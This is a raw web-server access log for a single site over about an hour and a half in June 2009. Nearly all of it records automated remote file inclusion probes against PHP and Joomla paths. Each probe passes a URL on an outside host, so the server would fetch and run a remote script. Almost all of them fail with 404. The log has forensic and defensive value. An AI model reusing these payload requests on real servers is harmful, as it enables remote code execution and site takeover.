194.63.248.44 - - [28/Jun/2009:17:02:00 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.63.248.44 - - [28/Jun/2009:17:02:00 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.63.248.44 - - [28/Jun/2009:17:02:04 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.247.76.181 - - [28/Jun/2009:17:07:36 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
80.247.76.181 - - [28/Jun/2009:17:07:36 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
80.247.76.181 - - [28/Jun/2009:17:09:32 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
80.247.76.181 - - [28/Jun/2009:17:09:32 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
194.109.22.117 - - [28/Jun/2009:17:11:58 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.redneckmba.com"
94.23.2.21 - - [28/Jun/2009:17:12:14 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.2.21 - - [28/Jun/2009:17:12:14 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.2.21 - - [28/Jun/2009:17:12:14 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.63.248.44 - - [28/Jun/2009:17:12:47 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.63.248.44 - - [28/Jun/2009:17:12:47 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.63.248.44 - - [28/Jun/2009:17:12:47 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.109.22.117 - - [28/Jun/2009:17:12:53 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:13:46 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:13:46 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:13:46 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:13:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:13:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:13:58 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.109.22.117 - - [28/Jun/2009:17:14:11 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.redneckmba.com"
194.109.22.117 - - [28/Jun/2009:17:14:11 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.redneckmba.com"
94.23.2.21 - - [28/Jun/2009:17:14:44 -0700] "GET /logs/access_090112.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.63.248.44 - - [28/Jun/2009:17:15:01 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.63.248.44 - - [28/Jun/2009:17:15:01 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.63.248.44 - - [28/Jun/2009:17:15:01 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
194.109.22.117 - - [28/Jun/2009:17:15:05 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.redneckmba.com"
194.109.22.117 - - [28/Jun/2009:17:15:07 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.redneckmba.com"
94.23.2.21 - - [28/Jun/2009:17:15:51 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:17:08 -0700] "GET /logs/access_090112.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:09 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:09 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:10 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:16 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:16 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:17 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:18 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:18 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:17:19 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:17:34 -0700] "GET /logs/access_090112.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:19:14 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.253.238.151 - - [28/Jun/2009:17:19:33 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:21:17 -0700] "GET /logs/access_090112.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:21:20 -0700] "GET /logs/access_090112.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:21:24 -0700] "GET /logs/access_090112.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:24:12 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:24:23 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:17:25:50 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.197.183.21 - - [28/Jun/2009:17:30:09 -0700] "GET /logs/access.log//index.php?sayfa=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
66.197.183.21 - - [28/Jun/2009:17:30:09 -0700] "GET /logs//index.php?sayfa=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
66.197.183.21 - - [28/Jun/2009:17:31:36 -0700] "GET /logs/access.log//index.php?sayfa=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
66.197.183.21 - - [28/Jun/2009:17:31:36 -0700] "GET /logs//index.php?sayfa=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
78.110.50.134 - - [28/Jun/2009:17:31:41 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
78.110.50.134 - - [28/Jun/2009:17:31:45 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
78.110.50.134 - - [28/Jun/2009:17:36:20 -0700] "GET /logs/access.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
78.110.50.134 - - [28/Jun/2009:17:36:20 -0700] "GET /logs/access.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
78.110.50.134 - - [28/Jun/2009:17:36:20 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
78.110.50.134 - - [28/Jun/2009:17:36:20 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
78.110.50.134 - - [28/Jun/2009:17:36:20 -0700] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
78.110.50.134 - - [28/Jun/2009:17:36:20 -0700] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
66.11.230.251 - - [28/Jun/2009:17:36:23 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
66.11.230.251 - - [28/Jun/2009:17:36:23 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:39:29 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:39:30 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:39:31 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:39:33 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:40:06 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:40:06 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:40:15 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:40:15 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:41:54 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:41:54 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:42:15 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:42:15 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:42:21 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:42:22 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:42:30 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:42:30 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:43:32 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:43:32 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:17:45:37 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:17:45:54 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:46:59 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:46:59 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:47:12 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
61.67.196.130 - - [28/Jun/2009:17:47:12 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:17:47:36 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:17:47:37 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
218.30.100.97 - - [28/Jun/2009:17:47:39 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.30.100.97 - - [28/Jun/2009:17:47:39 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.30.100.97 - - [28/Jun/2009:17:47:39 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:17:47:45 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:17:48:17 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:50:48 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:50:48 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:51:00 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:51:01 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:51:16 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.251.168.157 - - [28/Jun/2009:17:51:16 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:17:52:29 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:17:52:34 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
220.181.61.234 - - [28/Jun/2009:17:55:21 -0700] "GET / HTTP/1.1" 200 779 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:17:58:54 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:17:58:54 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
67.215.238.186 - - [28/Jun/2009:17:59:35 -0700] "GET /logs/index.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:00:16 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:00:16 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:00:25 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:00:25 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:00:36 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:00:36 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
65.55.210.83 - - [28/Jun/2009:18:02:19 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
65.55.210.83 - - [28/Jun/2009:18:02:19 -0700] "GET /logs/?N=D HTTP/1.1" 200 2082 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:04:29 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:04:30 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:04:43 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
87.106.179.130 - - [28/Jun/2009:18:04:43 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:05:31 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:05:39 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:06:28 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:06:28 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:11:54 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:12:15 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:19:09 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:19:13 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:21:10 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
150.214.108.8 - - [28/Jun/2009:18:21:18 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:12 -0700] "GET /logs/access.log//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
